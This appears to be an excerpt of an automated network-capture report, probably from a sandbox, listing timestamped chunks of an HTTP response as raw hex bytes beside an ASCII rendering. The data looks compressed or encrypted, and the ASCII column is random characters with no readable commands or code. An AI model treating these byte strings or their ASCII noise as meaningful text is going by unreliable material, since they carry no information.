                                                                                                                      2023-09-07 16:19:24 UTC1437INData Raw: 1d e1 a8 52 11 87 6e 4d 7d 30 e0 35 57 8a 47 68 35 13 03 01 2c a7 6c 5a 67 ae b4 3b 56 17 9f ff 12 a1 b2 c4 d3 79 45 5e 33 0c d5 a2 3e fa ab fc d1 95 74 21 05 57 59 b3 01 b7 96 2d 64 ab 04 1d f2 dc f1 43 be 2c 8d 83 5c b1 63 e2 d8 7e ce c2 01 be e3 a5 b0 c9 7c 18 18 df d3 5b 59 b8 78 2a 9b 4f 56 d1 6b 96 6e 69 3e 41 3e 7b db e9 35 ca 4c 94 4a f4 2b 63 9d 17 5a 32 30 1e 9a b0 9b 26 2d e1 06 7b f4 be 91 b8 ce 83 a4 0f 43 e1 3c f6 c9 15 2e a4 cd ac c1 5b 6c d9 dd 51 cf 32 94 ab 08 8b 6d d3 d2 01 e2 81 1a 1c 31 f7 44 68 4a ce 2b f3 c8 87 63 b1 98 17 40 39 3f 22 54 d3 d5 8e db d6 b0 1f 2e f9 c2 e8 3c 72 29 0e 72 2c 16 1c 2f 92 b5 b5 44 b5 9a 2e bf 34 fe 06 f7 ce 4d c2 3c f2 48 36 68 90 d7 b9 63 c6 03 73 8d f6 07 ec a4 79 2e 46 4f a2 c9 0f 40 02 fb 0a 79 16 74
                                                                                                                      Data Ascii: RnM}05WGh5,lZg;VyE^3>t!WY-dC,\c~|[Yx*OVkni>A>{5LJ+cZ20&-{C<.[lQ2m1DhJ+c@9?"T.<r)r,/D.4M<H6hcsy.FO@yt
                                                                                                                      2023-09-07 16:19:24 UTC1445INData Raw: 0a 48 29 db 8d 47 91 d6 51 6a 92 4f 6c 51 16 a5 96 4e de aa 53 69 9a 1f 96 b3 12 90 56 5f 8b 9f 8e aa 96 07 82 6d 2d 81 76 0a 07 89 35 9c 4b 10 74 6f 84 5f 01 cb 56 b8 20 5e 03 9c 15 91 7e 64 43 1f 80 57 3b 50 a9 a5 07 53 f2 68 9a 35 94 c4 c3 2a 44 b3 68 b4 3b 99 36 6f e6 64 fb a2 69 4b fc ba 48 89 56 c1 3a 40 ea 25 34 99 ae e8 d2 f5 44 27 1a 6d 37 36 af 59 e5 9e 1d df 8d 1a d1 38 4a 28 30 bf f3 ba 41 c5 00 81 fa b2 70 bc 24 bb bb 31 1f 8c aa d4 54 27 c2 83 34 cd 9e 88 b0 d8 25 f4 83 aa 16 7f c0 55 3e 89 08 f7 66 25 6b 8f 61 7b 26 51 65 6f 54 43 89 04 95 6f 27 df 05 ca 87 2c 3f a5 98 12 6b c0 93 65 e4 25 17 52 99 8d 35 4c d2 7a a4 9f e2 b1 63 5b 7c d7 76 36 f8 1b 9b 7d ed fe ce 50 d3 75 7e ad 02 21 6c 90 ab d9 df ba 8a f8 04 0d f8 44 f6 29 b6 7e 7b db d9
                                                                                                                      Data Ascii: H)GQjOlQNSiV_m-v5Kto_V ^~dCW;PSh5*Dh;6odiKHV:@%4D'm76Y8J(0Ap$1T'4%U>f%ka{&QeoTCo',?ke%R5Lzc[|v6}Pu~!lD)~{
                                                                                                                      2023-09-07 16:19:24 UTC1453INData Raw: f1 68 9e 87 9f 0b 66 8f c2 59 7e d3 16 21 e4 d7 ca fa 58 5d 46 6a 76 6c da 39 84 57 8c de bb 8d db 51 5a fe 91 36 7f a6 6f fe e0 ef 9b c6 8e fd f7 be 6f 9a b8 c9 6d de 37 8d bd 39 cf a3 3d 3b cf 93 3a cb 7d d3 f8 33 f3 3c 81 63 f9 f7 4d 23 80 33 0a 6e 12 9c f8 31 a4 bb e5 83 6f e7 f2 21 f7 7f 5a 3b 07 74 f7 7f 7a 3b 8f 0c 59 ed 3c 6a 40 79 3d f0 5d ea 71 9f b1 9d a7 bb dd 66 3b 4f 77 41 3a 7d 76 3b 63 db 21 c1 bf 7c cb 9f ee 51 0b db bb 26 63 b5 77 a0 d7 fd ef ba 47 ad b8 f5 8f bf ef 3c 97 bd 3f ef c9 0f 9f b6 5d bd fb dd ff 3d f8 32 50 cb 15 9f aa 4b 59 4b 3e 15 61 4b cf be 54 4a 1a b2 8e e9 cc da a3 ce 91 07 6f e5 bd 20 e9 d6 39 00 b4 7d 80 c3 e7 b3 17 7c 4e e2 8e 00 ce 28 b8 11 c0 19 3f 60 e1 4e 1f 70 9f 11 b7 fc 36 c6 c5 7d 20 c6 4d 40 da c9 f3 c4 dd
                                                                                                                      Data Ascii: hfY~!X]Fjvl9WQZ6oom79=;:}3<cM#3n1o!Z;tz;Y<j@y=]qf;OwA:}v;c!|Q&cwG<?]=2PKYK>aKTJo 9}|N(?`Np6} M@
                                                                                                                      2023-09-07 16:19:24 UTC1461INData Raw: 8e 5d df 2c 13 3e de e5 f8 47 d1 81 82 91 13 77 7f bc db e2 76 4a b8 fb 0d a7 17 23 2f 4e 91 45 5c fa 30 40 bc 35 f2 6c ff 1d 7e 3a 6a df b2 fb 9e 7b 2f f1 57 dc ed 7b 75 f6 35 ff cc 23 e7 97 7f 78 79 e5 e2 b0 c7 f2 a0 8f d7 95 5d 42 26 a6 6d 28 2d 4a be a1 75 37 0f fe ad 85 99 4f 52 84 ed da 93 23 eb dd ee 35 dc 42 b8 96 cf ed e0 e0 50 e7 c0 78 ba ee 49 e7 1d e9 09 db c6 a9 68 9b 4b a9 bb 17 3f 14 9f b5 7b 77 67 e8 bc 93 d7 3b b6 99 57 ba 79 fb ea ab c7 1b f9 6f 1b 38 a6 de 76 8f 9e 89 fb 77 6d 50 ec 29 a6 f3 8b fe dc b9 ed e0 82 ba f7 77 9a 2d b8 b0 45 d7 23 f4 f2 1f 9b b2 2f fc e2 d4 fe a6 79 7e c3 5b 5a c7 3a 92 07 63 7b 4a 7f ea 3d 2c b3 de ea 41 c3 46 d4 39 67 f7 f0 97 6a 9b 59 1d 36 52 b6 5b 16 59 7d 1f 3c cb be f2 c2 32 eb 09 e9 cf 39 2d ab 4a 2c
                                                                                                                      Data Ascii: ],>GwvJ#/NE\0@5l~:j{/W{u5#xy]B&m(-Ju7OR#5BPxIhK?{wg;Wyo8vwmP)w-E#/y~[Z:c{J=,AF9gjY6R[Y}<29-J,
                                                                                                                      2023-09-07 16:19:24 UTC1469INData Raw: 7d ad f7 4d bc eb f5 87 a7 24 7e 7a 9b 2b ef c4 0b 86 2d 32 b7 da bf 72 ff 41 ce a1 6b 1b b6 2b 7d 9d ac 6d 44 2d 34 51 0b 56 9c ed 58 bd eb bb f1 3c fb e3 f7 74 3f 3a 5c 3f e3 ba fe c0 ea ee 4d 78 21 79 2b b2 da 5e 3b 96 aa 4f 1e c1 71 d0 9c db 58 f5 ab f6 e4 c2 84 e5 cf da 3c 6d 3c 27 f4 d3 86 1e 6b 04 bc a1 a7 b3 22 ff b2 3c fb 6c 92 e4 56 70 fb a9 d2 b7 fc f2 77 9d 73 fb f3 67 b5 ec 22 6a bf e5 46 c5 82 2b 07 b7 bd 3b f6 b8 8e 60 c9 94 26 95 76 29 4b 22 e4 56 bd 16 f6 3f 30 b6 83 ef cd 39 3f ce ef ea e1 51 25 6c 1f bb 7b fe a2 f2 3b 1f a7 0c 19 ee d8 e5 5e c3 ec 35 be 1e 67 79 93 c3 d7 99 f5 79 24 d8 9b 3f 86 7e 50 36 33 6b 70 e2 eb fa e1 8f 07 7e 7a 16 d7 7b 9e e2 07 cb d6 97 7a 8b 83 8f 15 9c 5d 3b aa db 9a 73 57 46 f3 bb 2b 0f b7 1f 32 32 6b d2 b6
                                                                                                                      Data Ascii: }M$~z+-2rAk+}mD-4QVX<t?:\?Mx!y+^;OqX<m<'k"<lVpwsg"jF+;`&v)K"V?09?Q%l{;^5gyy$?~P63kp~z{z];sWF+22k
                                                                                                                      2023-09-07 16:19:24 UTC1476INData Raw: 4b 57 be 17 93 bf db 92 ff 79 fd 87 33 2a ed fe ad f5 1f 96 bd b0 c3 fa 0f f3 c0 2c 2c b7 fb a6 be cf e2 27 76 9f e9 fb 14 c1 30 94 e8 44 99 30 dd 25 62 8d 94 42 2a 6e f4 5a 84 8d c2 0d 9e 71 5a a4 c1 c4 e0 8c 41 ca 65 28 53 9d 66 6a b1 56 9b cd 6a a2 a5 28 65 90 4a a1 d2 68 4d c2 25 f2 94 4c 35 0e 15 46 85 52 a1 e1 21 54 5f 21 5e 52 c0 0c 85 b9 1e 1c 1e 08 93 1d df 0f 78 a4 64 86 c9 30 47 0e d4 41 92 2b c2 fa 38 89 7f 82 5c aa 4b c7 de 39 ac 37 c5 8a 52 27 8a 46 63 55 28 ff f7 45 a7 9a e4 c6 d8 09 16 af 9f ec 9f f4 67 e9 a1 47 15 7b 1d af 0c f0 0d 99 bd d7 bb d1 d3 f1 23 9b a2 72 46 c2 78 2a ac 6b 8f f5 98 a0 f1 82 cc 19 c7 89 49 8d 27 fe c9 75 ed 71 18 6a 27 d4 7f 6c 1f a0 30 e4 a7 66 d2 d7 86 cd 13 ec 0d f1 3c 27 d9 e3 71 55 39 89 c4 ad 5c 6a cf a3 96
                                                                                                                      Data Ascii: KWy3*,,'v0D0%bB*nZqZAe(SfjVj(eJhM%L5FR!T_!^Rxd0GA+8\K97R'FcU(EgG{#rFx*kI'uqj'l0f<'qU9\j
                                                                                                                      2023-09-07 16:19:24 UTC1484INData Raw: 9f c1 0e e6 e6 03 96 bc e4 08 70 ff 62 c9 2b 8c b4 e4 cd 88 02 3f 00 cf 87 96 3c fa 31 d0 7e bf 01 cd dc cd 8a 97 b7 18 e2 24 5b 1a f8 cf e9 fe 40 3b aa 2d 79 95 00 65 59 90 36 db 12 f3 99 7b ee b4 c4 b4 ae a1 4d 62 04 41 d1 31 c1 f8 39 94 00 46 70 0c 2c 5c 1a 29 e9 c9 18 19 1a 14 a8 67 59 3b 46 1b 14 22 2e 8c 73 cf 34 05 be 5f 97 7a 68 d4 58 96 8e 2b 63 71 d6 26 a1 ab 73 16 92 6a 58 98 38 42 8d 2c 55 9e 43 5a 9d a1 0f 24 6a 44 db b0 fc 9c 08 15 45 05 25 f1 e3 82 c3 a3 43 22 63 f1 b2 ae c1 95 82 dd a8 58 9b ce 20 2e e3 fe 5f 43 0e a1 f8 7a a9 5c 85 c6 19 89 8c c7 18 9e 2f 68 e6 e1 c0 90 4c 58 bf b2 99 e8 62 e4 83 58 66 75 2a 76 38 52 e4 0b 71 5c ea 12 f4 5f d9 4b 07 5e 3a d3 a9 c6 76 94 a5 e2 b3 77 66 6c a1 36 72 ef 8d f9 df 73 59 e6 e9 20 b1 b2 83 0e 3f
                                                                                                                      Data Ascii: pb+?<1~$[@;-yeY6{MbA19Fp,\)gY;F".s4_zhX+cq&sjX8B,UCZ$jDE%C"cX ._Cz\/hLXbXfu*v8Rq\_K^:vwfl6rsY ?
                                                                                                                      2023-09-07 16:19:24 UTC1492INData Raw: 91 ad c3 b7 3e 0f eb 45 65 f7 17 5f b8 9b 94 2b 69 af ae a6 b7 93 68 db 4a 94 d4 4a 55 32 ad 52 47 9a df 88 c3 19 35 7b 31 7a a5 1a ef fe 08 8e 13 33 4f 8a 69 84 e2 0d 22 6d 19 04 84 36 9b 9e dd 61 1d c8 22 32 4b f0 88 26 82 0c 49 9e f0 01 e8 59 6b 12 ab 1c 49 9f 22 ca d5 ba d4 50 33 92 8e ea 96 a2 49 52 22 71 23 cc 5b 57 55 86 c9 83 54 be 56 ab 92 c8 c5 3a dc 0e cc 16 2a 3c 33 f3 33 6f d7 f0 c8 c8 cf 3c 6b af 5d 58 65 85 2d 45 54 d1 a5 33 9e 14 95 8e 1a 10 89 3f 60 e6 52 ac 0a f6 be 99 62 c4 12 44 c5 85 fb d1 48 26 2a f2 47 df 64 d4 86 48 c2 f0 dd 32 13 ea ac a5 f1 65 31 ea 1b 8c a9 8c 72 0a 58 5c 81 e7 13 11 e5 21 ad 29 27 c1 20 30 00 eb f9 43 cb 29 be 47 66 23 19 32 40 62 54 0c 19 98 be d0 66 f6 99 c6 32 d9 f7 af f8 08 e8 4b fa e0 88 bc 68 1c 4c 3b 1b
                                                                                                                      Data Ascii: >Ee_+ihJJU2RG5{1z3Oi"m6a"2K&IYkI"P3IR"q#[WUTV:*<33o<k]Xe-ET3?`RbDH&*GdH2e1rX\!)' 0C)Gf#2@bTf2KhL;
                                                                                                                      2023-09-07 16:19:24 UTC1500INData Raw: 90 6d b9 21 ff 6d 95 ce ba a0 aa 5d 95 59 65 c5 f3 e8 e8 82 37 49 18 eb 15 5c 2d b8 33 e5 da b4 e2 82 51 96 0c d1 3b 55 5f 5d 30 ca 9a a1 7f 3b bd 9b 50 05 e4 e5 9b 63 d0 23 dc e5 e1 40 ea af a8 7f f2 c5 f2 82 17 05 ef 87 9c 62 d3 17 64 41 c6 28 13 03 d9 0c b9 15 1c 5f cd f9 3c 09 4e 51 b3 bc 37 e7 c3 67 b2 b9 c5 27 6c e3 c0 68 82 12 7d 2e e4 bf b3 d5 73 e6 43 55 1e d7 e3 50 80 65 5c 11 96 e1 cd 40 58 89 fb 0a 63 25 4e 28 83 72 b4 7f 60 c4 32 83 c5 7a 64 4d fb b1 1a 93 bd 40 36 96 67 be 43 d6 4a b0 26 20 0c 49 c2 0f bc c2 6b 5e 15 f8 c6 97 1f 80 18 e6 3d 46 55 61 4a d4 7c 46 51 75 35 c6 70 38 cf 04 20 1e 2c eb bc 1e 69 d9 c3 77 27 35 ba ee 71 cb 95 94 0d a2 de 2b 7c 67 14 6e a4 26 b7 df 44 f9 b7 34 fb de 1c 12 3a bf 1e 5b 44 71 74 f5 51 25 d7 51 b8 f8 3a
                                                                                                                      Data Ascii: m!m]Ye7I\-3Q;U_]0;Pc#@bdA(_<NQ7g'lh}.sCUPe\@Xc%N(r`2zdM@6gCJ& Ik^=FUaJ|FQu5p8 ,iw'5q+|gn&D4:[DqtQ%Q:
                                                                                                                      2023-09-07 16:19:24 UTC1508INData Raw: 79 88 4d 81 b7 b4 77 b1 ac ad 1f b2 e5 b0 7d be 8e cb 51 56 6d e3 54 d8 f8 01 1b ff f6 5e e2 61 76 63 af 85 7f 99 f3 66 76 89 f3 10 5b e0 fc 20 9b e3 bc 9f cd 70 de c5 4e 72 1e 65 06 e7 07 98 ba d7 c2 ed b3 79 3b 78 5b 67 33 ab e3 bc 85 6d e1 3c cc 2a 38 ef 62 65 e0 ad fb 9b d8 cd 06 e2 2d ec 0a e7 61 76 89 f3 2e b6 d0 60 e5 7f 01 3c 14 ed 62 b3 e0 1d 47 3a d9 19 9b e7 39 ef 60 43 e0 91 68 33 0b 93 7d 57 17 6b e0 bc 99 6d e3 3c cc 2a 39 3f c2 ca 38 6f 61 d7 7f 8b 78 2b bb cc 79 1b 5b e4 7c 3f 9b e3 fc 00 3b c7 79 3b 3b c3 f9 61 76 92 f3 0e 96 e0 3c c4 fa 38 6f 62 ad 9c f7 b3 dd 9c 77 32 99 f3 6e 56 ce f9 51 b6 5a 4f bc 87 dd 00 ef ea 69 63 d7 ea ad 72 5d ad b7 ea eb 4a bd 55 4f 97 6d be 0c de 0d dc 25 f0 03 cd 9d ec 62 3d b5 5b 07 9b 27 de 8f f8 6c fd ac
                                                                                                                      Data Ascii: yMw}QVmT^avcfv[ pNrey;x[g3m<*8be-av.`<bG:9`Ch3}Wkm<*9?8oax+y[|?;y;;av<8obw2nVQZOicr]JUOm%b=['l
                                                                                                                      2023-09-07 16:19:24 UTC1515INData Raw: 1f a1 8e 8f 2f 0d 9f af a8 3f d7 cf 66 d5 e7 a5 04 e1 f6 20 ae 51 21 eb 0f bf 56 91 79 3d b3 9a f5 27 bc 08 e2 ba df 20 eb 0f df 07 45 de b0 9f c3 47 34 3c 9e 3b 36 ab 79 1f e7 0d 79 2e d3 84 29 96 12 18 45 12 5f 81 9f 7f c3 3e e7 96 34 ed 88 79 bc 6c 22 ae 4d 58 5b f0 8e 37 ed f9 d9 d4 b0 da 84 d5 5d f6 19 7d 6f ca f3 33 04 1f 7d 93 7c 8f a2 ac 9e 1f 31 97 97 11 c4 65 de 24 d7 3f f0 45 b3 8e 1f 57 5e ff 10 4e 03 71 4b a4 5f 2d f8 f5 37 e5 df 89 6a 68 fa b5 44 78 6d c4 79 df b2 ff 6e f9 7e 0d c2 0f bd a5 7e 1d 6d 97 d5 fb d5 62 04 14 5c ab b8 5e c7 eb 3f 69 ab 00 5f d5 b4 e5 7a 5d dd 56 96 b4 25 72 ad 32 80 ba cd b7 e4 79 72 54 bd 46 77 55 9e a7 81 d7 d5 f3 b4 49 78 b1 39 9f 31 54 b5 eb 78 bf a2 f0 a3 50 a6 2a bf d7 1e 9b 53 5f f7 f3 fc f4 9c ba bd e9 aa
                                                                                                                      Data Ascii: /?f Q!Vy=' EG4<;6yy.)E_>4yl"MX[7]}o3}|1e$?EW^NqK_-7jhDxmyn~~mb\^?i_z]V%r2yrTFwUIx91TxP*S_
                                                                                                                      2023-09-07 16:19:24 UTC1523INData Raw: f9 8f 57 47 b1 f0 41 ba eb c2 bf 13 74 b6 f2 0f da 6e f8 b9 26 f9 99 bd 92 d9 fb a4 4b f5 7f 25 bf 9e 0e 32 78 fa 74 c4 2b 1d f1 4a 47 bc d2 b1 9e a6 63 3d 45 fb 58 3a d6 53 d8 8d a4 0b ee ee 19 f0 d1 26 32 35 05 b8 3e f0 f1 83 cf 04 fc ab 36 93 54 43 6a 36 93 be 12 e7 1c e5 6c ef fb 73 63 55 11 73 c3 94 48 cf cb 43 be 0c b0 a9 d8 2c de 9f 08 e5 46 5f 22 8d 9b 39 71 ea 5c b6 6f 16 f1 1f 61 fa e2 86 9f b1 cd 22 46 b7 19 1b 55 06 d9 2c c8 20 6e 0b 32 44 ee 6b 57 31 75 3f 43 70 ab 5b 15 7d 2c 1e 55 e6 30 83 e7 04 97 a1 0c 3c c3 44 7b 24 83 62 ef 46 7b 2c 83 f6 5a 1e b4 c7 33 e8 1d 62 2f da be 0c 6d f0 9d 18 3f da 13 01 39 4f f9 21 93 da ea 80 9c af 8c 25 da da 80 54 de 59 d5 a1 9d 1c 90 ca 0f 7a b4 73 02 72 91 32 8e 68 1b 03 72 b1 32 ce 99 d4 7f c5 d6 9e c4
                                                                                                                      Data Ascii: WGAtn&K%2xt+JGc=EX:S&25>6TCj6lscUsHC,F_"9q\oa"FU, n2DkW1u?Cp[},U0<D{$bF{,Z3b/m?9O!%TYzsr2hr2
                                                                                                                      2023-09-07 16:19:24 UTC1531INData Raw: 64 6e 8f 62 74 68 0d ca 47 07 83 8d 6c c0 bc d9 80 cf 4b 36 a8 fe 73 33 5c 2b 72 33 91 bb 91 70 bf a9 e0 d7 ba d8 c3 4c 1c 34 e0 79 11 ca 76 94 37 51 fe 0e e5 77 68 57 ea 74 31 3a 97 9e c7 f5 02 e5 6b 28 67 a2 7c 0b e5 0a 94 2e 94 c7 ce ab 31 f4 1d d6 6f 9b 7c bf 23 e2 08 13 b7 a8 f7 8f e7 a1 ef fe 82 f2 d1 46 90 4f a2 7c ae 11 9e cf 9f d8 88 bf 5f d3 08 ef 9b 44 37 c2 bb 47 6f 36 c2 f1 df 2f 70 bf a5 11 de 37 b1 0a d9 f7 7b 8d df ab fb 23 9f 4c 1d 65 6c 11 a5 b7 7f 1b 55 9c 54 71 fe 12 6c a7 0e 96 ae 07 4f ad 04 3b da 10 eb 9f 2c c3 8e aa 6b 0d a3 8e e2 fa 76 74 f0 35 23 ea 82 f2 61 e9 d1 bf ed 39 ab bf da 46 19 43 d2 c1 1f 3b d1 53 71 94 89 41 82 f5 31 58 3f c1 de 67 b0 86 26 85 8d a8 d4 c7 46 35 e1 f9 6e 93 8a c1 45 95 fa 31 28 df 35 aa 62 f4 5a 51 6f
                                                                                                                      Data Ascii: dnbthGlK6s3\+r3pL4yv7QwhWt1:k(g|.1o|#FO|_D7Go6/p7{#LelUTqlO;,kvt5#a9FC;SqA1X?g&F5nE1(5bZQo
                                                                                                                      2023-09-07 16:19:24 UTC1539INData Raw: 1a 17 13 eb 4f 06 c9 1d 77 de ff 24 a1 7a 34 00 8b 40 be 61 b2 54 97 23 e8 13 c9 5c bb 9e 40 0a 84 d9 f5 ed 65 c8 5a 4f bd d1 a8 e5 f7 e8 f3 78 ee c5 67 39 42 4b 8a 6f 08 61 05 64 21 c1 62 2e c3 e9 d2 46 cc 79 37 69 b7 da 68 b0 3a 46 8a 44 f4 34 7d 6e 9a d1 40 da b3 bc 87 84 28 89 4d 2c 69 da 3e 69 e7 68 23 f5 be 60 25 69 21 ea a5 b2 0e 93 f5 a4 d3 7a d6 87 82 64 34 6f 54 db 4d da 09 80 be 92 3c 8c 69 82 8c 39 24 4c 4e f7 b9 e3 8d 74 0e 45 47 91 bf f8 fa cf 9a 4e b6 c9 69 f1 c7 d0 c5 07 a9 ce 47 5b 66 ff 2d 7d 32 9e 18 fe b7 90 45 ac c5 59 cd 02 7d 30 bd 95 d5 5e 15 79 d8 3b 76 d3 58 2b 56 9b 98 81 9f 56 d9 4d f5 4b a9 ed b6 fe 4a f4 f0 30 a7 32 ad 2d f9 12 cd 84 d5 86 1a cd d4 2a 84 1a 30 45 11 2c 24 42 6a 0d dc 9a 7c cc ea 37 c2 20 3d 5f 3f 79 ac 93 29
                                                                                                                      Data Ascii: Ow$z4@aT#\@eZOxg9BKoad!b.Fy7ih:FD4}n@(M,i>ih#`%i!zd4oTM<i9$LNtEGNiG[f-}2EY}0^y;vX+VVMKJ02-*0E,$Bj|7 =_?y)
                                                                                                                      2023-09-07 16:19:24 UTC1547INData Raw: 1b 55 e3 cf 47 fe 3e f9 ec 79 cf e3 b9 29 c7 8c 79 dd 7f 4e 5d 5f bb 56 99 fa 3e af 7f 3c 39 71 f4 ec 46 2f 9f 26 fd d5 f8 49 e3 2c ff 65 6d da 2f 9f 2a ff f9 68 62 ca 67 0f 56 6f be 63 eb 3f b3 43 2d c3 51 cb c9 71 53 52 66 5c 3e 11 b1 fd b3 ba 93 62 23 6b 26 1e 18 b2 fb e0 81 42 d7 9a 43 fd cb 9e b8 16 3a e7 93 47 fb 5e ab 56 fe 44 aa 2e 4f b9 fe 7d d3 9d 4f 4f ee 6e 5f 46 57 7d 48 23 b9 62 c3 b0 e3 47 b6 7c 38 2f eb e7 82 ee 6e aa 53 37 02 6b 25 ef 5e d5 e9 c1 9a b0 a6 f3 bc 3a ed c8 3a d6 f3 d9 8f 0b d7 66 27 27 db bc a2 df 1c 19 73 f6 eb a2 2f d7 fd bd 72 68 de ca bf 23 07 ec 0d f7 18 ff e5 4b f9 cd c1 fb 64 7f 5f bb 73 46 f7 fc d7 49 0b 2e 0f 58 d6 aa 69 85 1e f3 0b cb ef f5 57 47 6f fd e8 7a f6 b1 1b 57 26 26 15 9a f7 05 fc b3 df fb cf 7e ef ff e6
                                                                                                                      Data Ascii: UG>y)yN]_V><9qF/&I,em/*hbgVoc?C-QqSRf\>b#k&BC:G^VD.O}OOn_FW}H#bG|8/nS7k%^::f''s/rh#Kd_sFI.XiWGozW&&~
                                                                                                                      2023-09-07 16:19:24 UTC1554INData Raw: dc ba 15 d7 4f f8 f4 b0 ae fd ba 1e fc 9f 19 0f 4e 7e e7 ea 68 4a d7 55 0f ff db b6 67 ce bc f2 88 a1 d7 4f 39 78 d1 0f c7 bd d4 70 f2 65 d7 7e 7e fb 35 07 dd fe c9 81 7b 5e b1 a8 f1 d0 96 c1 87 67 d5 dd f8 1f ce b2 23 ef ca ab cf 7e 3f f3 b5 8c 97 d8 7b 75 fc e6 0d ab 76 9c b9 f1 ba c3 67 ef f4 c4 4f 96 74 be da 7c 60 db 45 93 5e 6e 78 b5 f5 bd a3 fa e7 cd 58 f5 a3 75 83 a7 fd e1 c1 65 ab ee 5f db ba d5 5f 53 f3 d0 89 f7 1d 36 f7 c9 e4 01 8d 47 6d 9b da d1 7e fc 49 8f 6e 3e bf 71 f9 dc b1 3f 1b 7c 63 fd 55 9f c6 1b f7 bd f7 cf 99 79 a7 dd 3e eb 37 3d d7 d6 5b c7 1d 73 d6 c2 cf ae 5d fe d8 b8 95 57 d5 6c 9b fa c6 7d 9b 5f 2e 8c 7d 7d 55 b1 3c 1a f9 62 48 32 56 ed 50 3e 56 d2 9b 26 1a f7 ca e6 2f fa c1 ff df ac ae dc 00 5e b3 79 62 cd 8a a1 89 35 cb 90 16
                                                                                                                      Data Ascii: ON~hJUgO9xpe~~5{^g#~?{uvgOt|`E^nxXue__S6Gm~In>q?|cUy>7=[s]Wl}_.}}U<bH2VP>V&/^yb5
                                                                                                                      2023-09-07 16:19:24 UTC1562INData Raw: eb 83 5a b8 76 9d 34 b7 b6 c8 f6 46 5b 5e 4d d8 f2 2b eb 1e f6 39 eb ca 4e e3 ca 89 02 de d1 5c cd 5a 83 87 72 81 55 58 f8 8b 6a 0d f2 59 ed 2a 9c 2b 6a 2f 79 98 4a 73 ce 43 4f eb 13 a4 ba 83 b9 ee 3d e8 be 3c 3c 34 8b 14 44 77 1a ab a5 09 9c ae 62 35 bd 4e b1 1a 33 ff 5b 62 35 bb 16 72 53 48 3c 76 44 9c 83 f0 f7 f9 62 ae 36 95 f5 d1 18 5f f5 b7 46 4d 73 89 e0 74 77 a2 b3 08 e1 8b f4 9a 7f ba 36 0e 1b ad 7d eb e3 39 86 56 0b f9 e2 3e d1 64 5b 8b 68 af 36 0b d9 15 73 d4 64 e6 6c d9 4a fd de ac 05 ae a1 3e 4f 51 9f 4d aa 2d 12 f4 66 33 bd ad 0c cb 12 5c 32 ac 65 1e f3 b6 5c 3a 0f 80 a0 37 9b e9 6d 76 a5 b7 88 e9 dd c8 b0 b9 a8 62 1b 32 49 c1 59 83 45 dc 7f 8b d4 3f c2 3a 07 59 4e 3c 79 82 63 d6 46 47 4d a5 9a ed ca 0a ae 5e 16 2b 31 5b b5 c8 f6 aa b8 da 50
                                                                                                                      Data Ascii: Zv4F[^M+9N\ZrUXjY*+j/yJsCO=<<4Dwb5N3[b5rSH<vDb6_FMstw6}9V>d[h6sdlJ>OQM-f3\2e\:7mvb2IYE?:YN<ycFGM^+1[P
                                                                                                                      2023-09-07 16:19:24 UTC1570INData Raw: a1 f5 a3 c9 f2 cb 33 23 69 be f5 25 b9 34 5e 01 eb e4 c5 fa 79 57 2c e1 78 a8 7c 28 a6 e9 ea e4 d9 10 b7 6f fa c0 cb f7 99 4c 63 e5 4a 52 af 52 ee 0f 42 36 42 c4 f6 d1 bd d7 8f 89 2f d1 a4 5f 48 39 6a 0d 2d cf ab a0 4a 9a dc d5 67 0e a8 7c 45 1d 4c 82 e4 cf 17 42 da 29 17 da be 25 de 26 ca c7 34 3e 18 b3 38 1e ee 92 63 f2 f6 11 ab ce 75 ea 29 03 2e 1f c7 97 e2 bd 8a 3e 97 7f 0d 54 b1 b6 8b 6b ce 94 8f af a9 66 ca 7f 29 7f 65 e5 f2 a6 d3 60 f9 6a 89 95 cf ca 7f a9 7c a5 eb 0a 83 5c be 9d 9d 62 0e 08 e7 ab f1 bd cf a8 ae f7 42 2b fc b0 1b c4 f2 ed f2 cd cd 2d e9 73 04 71 de 7e cd 9a 4f bb df 4d 89 f3 b7 38 3f 32 7f fe 7c 58 68 2e 02 af ad ab 35 5e be 48 24 ca 5f b1 c2 15 fe 8f bd 2b 01 8b ea 58 d6 05 26 2e 28 6e 49 4c ae 0f 97 84 c8 d5 18 8d 62 dc 17 54 44
                                                                                                                      Data Ascii: 3#i%4^yW,x|(oLcJRRB6B/_H9j-Jg|ELB)%&4>8cu).>Tkf)e`j|\bB+-sq~OM8?2|Xh.5^H$_+X&.(nILbTD
                                                                                                                      2023-09-07 16:19:24 UTC1578INData Raw: 9d 47 0d 07 d3 e7 26 da 66 26 d8 e6 a7 95 cf 4b 71 cc 39 68 9f be b7 38 2c 15 4b da 17 7f 5d bc bb bd 7e 4b 75 f9 ac 4f 3f fa cf 8b a7 3e 39 57 33 44 36 ff c3 a6 6d 78 6f e3 df d0 39 a3 77 42 21 51 29 b6 08 49 c7 4a a2 92 8b 17 a4 d8 c3 93 25 af 12 71 b0 24 32 a9 18 0f 22 d3 ca 17 1e 2a c7 a6 a9 9f 91 96 a4 c8 54 f4 99 a5 1f a4 97 2d ce 28 9f fe e5 c1 99 db 4e e1 92 34 68 c6 96 0e f9 3d 46 86 0f 9c 16 1d 1c 7e 60 c4 c2 d4 11 51 c9 c3 e6 ef 09 0e 4f 18 1e 95 3a 2c 6c 3f 1e 0f 0b 3b 10 12 99 3c 3c 32 79 e8 bc dd c1 e1 fb f0 60 78 d4 21 3c c0 ac e1 0b 92 d0 8e 86 85 c6 4b e5 f1 60 5e 7c 70 44 c2 f0 88 84 e0 b0 03 cf 5b 7d eb ef f7 e1 fb d0 e9 70 7f f1 94 bb 7f be f3 9f 35 f4 ef df ff 01 8c 0f 61 fc 11 c6 87 31 fe f8 ef 10 a5 76 fe c5 d3 ae 14 7f 8a f1 69 8c
                                                                                                                      Data Ascii: G&f&Kq9h8,K]~KuO?>9W3D6mxo9wB!Q)IJ%q$2"*T-(N4h=F~`QO:,l?;<<2y`x!<K`^|pD[}p5a1vi
